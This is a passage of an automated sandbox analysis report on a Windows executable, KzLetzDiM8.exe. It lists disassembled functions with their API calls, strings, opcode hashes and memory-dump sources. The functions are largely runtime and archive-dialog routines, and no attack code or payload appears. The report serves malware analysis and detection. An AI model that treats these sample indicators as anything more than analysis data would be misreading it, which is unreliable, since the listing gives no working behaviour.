                                                            • Instruction ID: 274b9f6fe4429efd88659b3535f17a1b479938f2494d24f7b8634c66da164adb
                                                            • Opcode Fuzzy Hash: e37dd03f429ca92429bc4d513f38898f554d99e428cbde13fe964fe1eaf41cda
                                                            • Instruction Fuzzy Hash: 68015E72100B44EFC7229B64EC88BD6BBEAFB1C710F004929F26A92161CB767A54CA50
                                                            Function 0020C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 0020C817
                                                              • Part of subcall function 00208DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?), ref: 00208DE2
                                                              • Part of subcall function 00208DCC: GetLastError.KERNEL32(?,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?,?), ref: 00208DF4
                                                            • _free.LIBCMT ref: 0020C829
                                                            • _free.LIBCMT ref: 0020C83B
                                                            • _free.LIBCMT ref: 0020C84D
                                                            • _free.LIBCMT ref: 0020C85F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 5877e0b3112e10e5ee603dd412413a2efb4ff4a195f693647384f93ec4525154
                                                            • Instruction ID: 08df779a23115b7fb3cbc93ccee90411479e636199934cdf20d66773d183bb0b
                                                            • Opcode Fuzzy Hash: 5877e0b3112e10e5ee603dd412413a2efb4ff4a195f693647384f93ec4525154
                                                            • Instruction Fuzzy Hash: 6EF04F72530302ABCB21EF68F889C4B77E9AB107207658919F648D75D3CE70FC908A58
                                                            Function 001F1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 001F1FE5
                                                            • _wcslen.LIBCMT ref: 001F1FF6
                                                            • _wcslen.LIBCMT ref: 001F2006
                                                            • _wcslen.LIBCMT ref: 001F2014
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,001EB371,?,?,00000000,?,?,?), ref: 001F202F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CompareString
                                                            • String ID:
                                                            • API String ID: 3397213944-0
                                                            • Opcode ID: 867dc4c0036e89f447dbaf4427e1273ae9cd0fac803972643d273137c422aca5
                                                            • Instruction ID: b8525638220ad419805b7829725c79f0b5c60ac9769c0e709e27e156acd21d3b
                                                            • Opcode Fuzzy Hash: 867dc4c0036e89f447dbaf4427e1273ae9cd0fac803972643d273137c422aca5
                                                            • Instruction Fuzzy Hash: E8F01D37018118BBCF269F51EC09DDA7F2AEF44760B218515F61A5A0A2CF729661DA90
                                                            Function 001F15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _swprintf
                                                            • String ID: %ls$%s: %s
                                                            • API String ID: 589789837-2259941744
                                                            • Opcode ID: 0a9a6f14cd47c6f80aa250f32fa6e9c294d17f55b63717cf3af2fafbedebaa70
                                                            • Instruction ID: 62fc284e0e661001a6b1cf287ecdeba125cf5cf46971bd2bfc403d160e6d22af
                                                            • Opcode Fuzzy Hash: 0a9a6f14cd47c6f80aa250f32fa6e9c294d17f55b63717cf3af2fafbedebaa70
                                                            • Instruction Fuzzy Hash: FD514E3528834CF6F62926908E46F3572A5BB15B54F254606F38EB80E1DBE3A410BB1B
                                                            Function 00207F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\KzLetzDiM8.exe,00000104), ref: 00207FAE
                                                            • _free.LIBCMT ref: 00208079
                                                            • _free.LIBCMT ref: 00208083
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\KzLetzDiM8.exe
                                                            • API String ID: 2506810119-1489116481
                                                            • Opcode ID: 0e3c104a5d9b5565cb6f64af1f3ee0cc63f3cca67267a1a3eefdf729104275f8
                                                            • Instruction ID: f7e6bed473a267e8a8bb95f137fab8afda183e0b0b072ef293cfa32cc40901a3
                                                            • Opcode Fuzzy Hash: 0e3c104a5d9b5565cb6f64af1f3ee0cc63f3cca67267a1a3eefdf729104275f8
                                                            • Instruction Fuzzy Hash: 8031C070A20309EFCB21DF95D88499FBBBCEF95300F10406AF84497292DAB09E54CB60
                                                            Function 002031D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 002031FB
                                                            • _abort.LIBCMT ref: 00203306
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer_abort
                                                            • String ID: MOC$RCC
                                                            • API String ID: 948111806-2084237596
                                                            • Opcode ID: 1bbd97e8298c070ee1b1b32c173db3f33f1783dea169739091d291a42a09f9d1
                                                            • Instruction ID: b55cdf6126a44d38027c86314eb24301a84c4b007a7410d31513d15f3c16093a
                                                            • Opcode Fuzzy Hash: 1bbd97e8298c070ee1b1b32c173db3f33f1783dea169739091d291a42a09f9d1
                                                            • Instruction Fuzzy Hash: 96414C7191020AEFCF15DF94CD81AEEBBB9BF48314F148199F90467292D7359E60DB50
                                                            Function 001E7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E7406
                                                              • Part of subcall function 001E3BBA: __EH_prolog.LIBCMT ref: 001E3BBF
                                                            • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 001E74CD
                                                              • Part of subcall function 001E7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 001E7AAB
                                                              • Part of subcall function 001E7A9C: GetLastError.KERNEL32 ref: 001E7AF1
                                                              • Part of subcall function 001E7A9C: CloseHandle.KERNEL32(?), ref: 001E7B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                            • API String ID: 3813983858-639343689
                                                            • Opcode ID: b6a0a11a72e25e48aacbd1267f4a484045bfd41f80e31f5fb47201fa52444891
                                                            • Instruction ID: e89f37da637e01c2919a2a2d7943505221a79a0b535939fca0cc0f3b10dad9de
                                                            • Opcode Fuzzy Hash: b6a0a11a72e25e48aacbd1267f4a484045bfd41f80e31f5fb47201fa52444891
                                                            • Instruction Fuzzy Hash: 6C310771D04688BAEF21EBA5DC45FFEBBB9AF29300F044015F805A71C2C7708A45CB60
                                                            Function 001FAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001E1316: GetDlgItem.USER32(00000000,00003021), ref: 001E135A
                                                              • Part of subcall function 001E1316: SetWindowTextW.USER32(00000000,002135F4), ref: 001E1370
                                                            • EndDialog.USER32(?,00000001), ref: 001FAD98
                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 001FADAD
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 001FADC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: ASKNEXTVOL
                                                            • API String ID: 445417207-3402441367
                                                            • Opcode ID: d518d3f8c34e793ce69907e3c10be844b227fb1a7bd40885e206e7d6ad2e1acb
                                                            • Instruction ID: 9b1f785ef987a685196cdcf2e6d49c4eca6d5cf7cdd03a939502787af34729f8
                                                            • Opcode Fuzzy Hash: d518d3f8c34e793ce69907e3c10be844b227fb1a7bd40885e206e7d6ad2e1acb
                                                            • Instruction Fuzzy Hash: 5311D372280604BFD3118FE8EC49FBA37A9EF5B742F800101F349DB4A0C765A9559723
                                                            Function 001ED8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __fprintf_l.LIBCMT ref: 001ED954
                                                            • _strncpy.LIBCMT ref: 001ED99A
                                                              • Part of subcall function 001F1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00221030,?,001ED928,00000000,?,00000050,00221030), ref: 001F1DC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                            • String ID: $%s$@%s
                                                            • API String ID: 562999700-834177443
                                                            • Opcode ID: ab3df6c8e38d525bf48b6a06ac1f6e43e68dc4618b6e8f6748cc9cd4d11b3a3b
                                                            • Instruction ID: 262588059e91edca0c985f4e3fd8bbb22ef0709006aa3c4ced567f5c62db31c8
                                                            • Opcode Fuzzy Hash: ab3df6c8e38d525bf48b6a06ac1f6e43e68dc4618b6e8f6748cc9cd4d11b3a3b
                                                            • Instruction Fuzzy Hash: B0218E32840688AADF21EEA5DC45FEE7BE8AF15708F040012F914961A3E371D658CB51
                                                            Function 001F0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,001EAC5A,00000008,?,00000000,?,001ED22D,?,00000000), ref: 001F0E85
                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,001EAC5A,00000008,?,00000000,?,001ED22D,?,00000000), ref: 001F0E8F
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,001EAC5A,00000008,?,00000000,?,001ED22D,?,00000000), ref: 001F0E9F
                                                            Strings
                                                            • Thread pool initialization failed., xrefs: 001F0EB7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            • Opcode ID: c0d8d0c3e1c1ad1f6425fc050bceef4185e3a7105e839781ab88cb0653fd9b61
                                                            • Instruction ID: c9026f40e2be10ee50d286edac09cfe9fc0d5dd228fe084d47dc634730d8dd2d
                                                            • Opcode Fuzzy Hash: c0d8d0c3e1c1ad1f6425fc050bceef4185e3a7105e839781ab88cb0653fd9b61
                                                            • Instruction Fuzzy Hash: 3A1154B164070C9FC3319F669C849A7FBDCEB69744F24482EF1DAC3202DB7159408B54
                                                            Function 001FDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                            • API String ID: 0-56093855
                                                            • Opcode ID: 61587e878d1f69cdd2b98ce45109fa1a7090c9ecab9590c8725f3b99eea57e26
                                                            • Instruction ID: ae24c7914f6ee450c5f6d00167ff5fa14e59c9def28b700539bc09c46b7ff792
                                                            • Opcode Fuzzy Hash: 61587e878d1f69cdd2b98ce45109fa1a7090c9ecab9590c8725f3b99eea57e26
                                                            • Instruction Fuzzy Hash: 64019276504249BFDB20AFD4FC4CABA3BA6F759354B001425FA05822B0C730D851DBA0
                                                            Function 00209A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                            • Instruction ID: b05d990baa0425b8b299f51e6788e0df0f347ef80111ba52955b88f68507dccb
                                                            • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                            • Instruction Fuzzy Hash: 78A11772E243869FE711CF18C8917AEBBE5EF55310F18416EE5869B2C3C2798DA1CB50
                                                            Function 001EA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,001E7F69,?,?,?), ref: 001EA3FA
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,001E7F69,?), ref: 001EA43E
                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,001E7F69,?,?,?,?,?,?,?), ref: 001EA4BF
                                                            • CloseHandle.KERNEL32(?,?,?,00000800,?,001E7F69,?,?,?,?,?,?,?,?,?,?), ref: 001EA4C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            • Opcode ID: 53ca5029a110f39081d74821dc0b7fde0a1d5aaeacdf7092428fb5276dd0569b
                                                            • Instruction ID: cc338c3595f62193d1c4d005e59d2bb736c443b1e9f2c05d518aab1ea795ed23
                                                            • Opcode Fuzzy Hash: 53ca5029a110f39081d74821dc0b7fde0a1d5aaeacdf7092428fb5276dd0569b
                                                            • Instruction Fuzzy Hash: E841CC312487C1AAE721DF25DC49BAEBBE8AF94300F484919B6D1971C0D7A4AA48DB53
                                                            Function 001E1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            • Opcode ID: a1f51be0264617c585b181b341136f66a0c593dffa577e423d0beb7d04c67bd3
                                                            • Instruction ID: 9d23e64b8c8cdd4a3231116854aace08664e7869ee10bb69d47f4792ca11354c
                                                            • Opcode Fuzzy Hash: a1f51be0264617c585b181b341136f66a0c593dffa577e423d0beb7d04c67bd3
                                                            • Instruction Fuzzy Hash: 1541B47590066AABCB25DF68CC099EE7BBCEF15310F100129FE45F7242DB30AE558AA4
                                                            Function 0020C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,002047C6,00000000,00000000,002057FB,?,002057FB,?,00000001,002047C6,2DE85006,00000001,002057FB,002057FB), ref: 0020C9D5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0020CA5E
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0020CA70
                                                            • __freea.LIBCMT ref: 0020CA79
                                                              • Part of subcall function 00208E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00204286,?,0000015D,?,?,?,?,00205762,000000FF,00000000,?,?), ref: 00208E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: ad638d222da82451025c6c88fa0558dc1303ada47613334e408933962ca5060d
                                                            • Instruction ID: 7a16e5319e6cc516bd9f6b2be9f7abf94b0a01e6706324816428ba83c9a5bb3b
                                                            • Opcode Fuzzy Hash: ad638d222da82451025c6c88fa0558dc1303ada47613334e408933962ca5060d
                                                            • Instruction Fuzzy Hash: 9F31A0B2A2031AABDF24DF64DC55DEE7BA5EB51310B144228FC04D6291EB35CD61CB90
                                                            Function 001FA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 001FA666
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 001FA675
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001FA683
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 001FA691
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
